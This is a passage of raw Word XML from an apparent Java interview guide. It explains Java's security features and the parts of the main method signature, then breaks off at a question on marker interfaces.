        <w:t xml:space="preserve"> by the JVM to ensure it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC84A1F"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Obeys access restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0752E"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Doesn't overflow/underflow memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C5189"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Has correct data types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140B6DB"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Prevents malicious or corrupted bytecode from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3D15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4. ClassLoader and SecurityManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EFD45E"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java’s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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SecurityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (though deprecated in Java 17+) allows you to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime access control policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617CF215"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5. Sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A2395"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applets (now obsolete) used to run in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, restricting file access, network, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5353C69F"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applies to custom environments like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or plugin systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7A42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6. Strong Access Modifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F9253"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Keywords like private, protected, final prevent unwanted access or overrides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D4CB9"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 xml:space="preserve">Supports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keeping internal logic safe from external interference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5357E"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7. Exception Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADEBE6" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8. Built-in Cryptography &amp; SSL APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367CD11" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>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provides APIs for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>secure communic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ata encryp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essage integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like javax.crypto, java.security, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032EDB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9. Runtime Monitoring with JVM Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250AD96" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>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has profiling, monitoring, and diagnostic tools (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JF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JConso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VisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to catch issues early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C201E6C"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10. Regular Security Patches &amp; Community Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E9560"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 xml:space="preserve">Oracle and the OpenJDK community release </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent security updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF52DE8"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Vast community support ensures vulnerabilities are spotted and patched quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF19A9"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CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF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CE4B95" w14:paraId="01DD5D1E" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD426C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Security Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E1B4A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Java's Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="43878081" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2449FC93"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Memory Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="456B617B"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No pointers, GC prevents memory attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="009C89A3" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4059A00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Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="495C9A6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trong access modifiers and class isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="50BBB37C" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1058DD60"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de Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C31775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Bytecode is checked before execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="766C756E" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BE175A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Runtime Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236BB787"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ecurityManager, ClassLoader protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="19C2E350" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39E1F06D"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mmunication Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BD15BFE"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SL, TLS, Encryption libraries available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D429AF7" w14:textId="1C0ED7C4" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="009A5C5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc197867222"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain public static void main (String[] args) method?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1D589C2A" w14:textId="5A1F2F55" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="006C37EB" w:rsidP="00CE1D69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Hi</w:t>
      </w:r>
      <w:r w:rsidR="002D4D31" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidR="002D4D31" w:rsidRPr="00CE4B95">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CE4B95" w14:paraId="5C0275AB" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6BAF74"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Part</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D36D7D3"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2D4D31" w:rsidRPr="00CE4B95" w14:paraId="7DA9DC5B" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65690DE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public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A47C05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Access modifier – means this method can be called from anywhere.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="6E1FF205" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="787795B4"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atic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB703F8"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No need to create an object to call this method — JVM calls it directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="70126B8E" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A949B1B"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void</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120F4D3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Return type – it doesn't return any value to the JVM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="72C3E51F" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DB51D5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ain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7833B56C"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ethod name – JVM looks for this specific method as the entry point.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="2227FF0B" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6039BDE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ring[] args</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22368F66"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Command-line arguments – passed to your program when it starts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73700B4E"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each part is important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4033B"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ublic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CBA1C" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM can access it</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315CAF8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atic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC74C80"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JVM doesn't create an object of your class to call main().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE9EA5"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 xml:space="preserve">Declared static so it can be called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without creating an instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8F91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void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969607E" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main() doesn’t return anything. It's just the entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA799E3"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in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC78AAF" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM always looks for this method name to start the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142020A9"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args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F91B901" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An array of String values passed during command-line execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04732B64" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:num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7CCDB0F"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java MyApp Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC74D0"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Then args[0] = "Hello", args[1] = "World"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A2966"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plete Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B33E73"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Wor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6FB8B0"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D1BE4"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Java!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3DF81"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9837BC" w14:textId="2351416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26B3F8"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Fun fact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D043D"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You can actually write it like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720DF621" w14:textId="0C85787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31E27"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CE4B95"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Pr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2577E9C6" w14:textId="69968D83" w:rsidR="00FE3834" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE3834">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc197867223"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the marker interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="579CF272" w14:textId="6FCCEDBC" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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marker interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
